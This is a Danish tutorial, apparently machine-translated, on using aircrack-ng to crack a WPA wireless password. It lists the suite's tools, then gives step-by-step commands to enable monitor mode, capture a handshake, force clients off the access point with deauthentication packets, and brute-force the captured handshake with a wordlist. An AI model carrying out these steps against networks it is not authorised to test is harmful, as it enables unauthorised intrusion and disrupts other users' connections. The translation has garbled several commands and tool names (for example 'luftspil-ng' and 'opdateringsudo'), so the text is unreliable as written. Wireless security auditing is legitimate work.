Airmon-ng
Airmon-ng bruges til at styre trådløse korttilstande og til at dræbe unødvendige processer, mens du bruger aircrack-ng. For at snuse til en trådløs forbindelse skal du ændre dit trådløse kort fra administreret tilstand til monitor-tilstand, og airmon-ng bruges til dette formål.
Airodump-ng
Airodump-ng er en trådløs sniffer, der kan fange trådløse data fra et eller flere trådløse adgangspunkter. Det bruges til at analysere nærliggende adgangspunkter og til at fange håndtryk.
Airplay-ng
Aireplay-ng bruges til replay-angreb og som pakkeinjektor. Det kan de-godkende brugere fra deres AP'er for at fange håndtryk.
Airdecap-ng
Airdecap-ng bruges til at dekryptere krypterede WEP, WPA/WPA2 trådløse pakker med kendt nøgle.
Aircrack-ng
Aircrack-ng bruges til at angribe WPA/WEP trådløse protokoller for at finde nøglen.
Aircrack-ng er let at installere i Ubuntu ved hjælp af APT. Skriv bare følgende kommando, og dette installerer alle tilgængelige værktøjer i Aircrack-ng suite.
sudo apt-get opdateringsudo apt-get install -ogaircrack-ng
Anvendelse
I denne artikel tager vi et hurtigt kig på, hvordan du bruger aircrack-ng til at knække et krypteret trådløst netværk (TR1CKST3R i dette eksempel) for at finde adgangskoden.
Først og fremmest skal du liste alle tilgængelige trådløse kort tilsluttet din pc ved hjælp af 'iwconfig' kommando.
Vi bruger 'wlxc83a35cb4546' navngivet trådløst kort til denne vejledning (Dette kan være anderledes i dit tilfælde). Dræb nu alle processer, der kører på trådløst kort ved hjælp af airmon-ng.
[e -mail beskyttet]: ~ $sudoairmon-ng tjekdræbeStart Monitor -tilstand på 'wlxc83a35cb4546' ved at skrive
[e -mail beskyttet]: ~ $sudoairmon-ng start wlxc83a35cb4546
Nu har airmon-ng startet Monitor-tilstand på det trådløse kort, det ser ud som et andet navn 'wlan0mon'. Kør 'iwconfig' igen for at få vist trådløse detaljer.
Brug derefter airodump-ng til at se nærliggende trådløse adgangspunkter og deres egenskaber.
[e -mail beskyttet]: ~ $sudoairodump-ng wlan0mon 
Du kan indsnævre søgningen ved hjælp af MAC (–bssid) og kanal (-c) filtre. For at fange håndtryk (Håndtryk indeholder krypteret adgangskode), skal vi gemme vores pakker et sted ved hjælp af –write -indstilling. Type,
[e -mail beskyttet]: ~ $sudoairodump-ng--bss6C: B7:49: FC:62: E4-c ellevewlan0mon--skrive /tmp/håndtryk. cap
--bss: Access Points MAC -adresse
-c: Access Points kanal[1-13]
--skrive: Gemmer fangede pakker på et defineret sted
Nu skal vi de-godkende alle enheder fra dette adgangspunkt ved hjælp af Aireplay-ng-værktøj. Skrive
[e -mail beskyttet]: ~ $sudoluftspil-ng-0 100 -til [MAC_ADD]wlan0mon 
-a: Angiv adgangspunkter MAC til Aireplay-ng
-0: Angiv antallet af deauth -pakker, der skal sendes
Efter et stykke tid vil alle enheder blive afbrudt fra det adgangspunkt, når de prøver at genoprette forbindelse, vil kørende airodump-ng fange håndtrykket. Det vises øverst på kørende airodump-ng.
Håndtryk er gemt i '/tmp/' bibliotek og indeholder en krypteret adgangskode, der kan tvinges brutalt til offline ved hjælp af en ordbog. For at knække adgangskoden bruger vi Aircrack-ng. Type
[e -mail beskyttet]: ~ $sudoaircrack-ng/tmp/håndtryk.kap-01.kap-i/usr/del/ordlister/rockyou.txt
-i: Angiv ordbogens placering
Aircrack-ng gennemgår listen over adgangskoder, og hvis den findes, viser den adgangskoden, der bruges som nøgle.
I dette tilfælde fandt aircrack-ng adgangskoden brugt '123456789'.
Stop nu skærmtilstanden på det trådløse kort, og genstart netværksadministratoren.
[e -mail beskyttet]: ~ $sudoairmon-ng stop wlan0mon[e -mail beskyttet]: ~ $sudoservice network-manager genstart
Konklusion
Aircrack-ng kan bruges til at revidere trådløs sikkerhed eller til at knække glemte adgangskoder. Der findes nogle andre lignende værktøjer til dette formål som Kismet, men aircrack-ng er bedre kendt for god support, alsidighed og en bred vifte af værktøjer. Det har en let at bruge kommandolinjegrænseflade, der let kan automatiseres ved hjælp af ethvert scriptsprog som Python.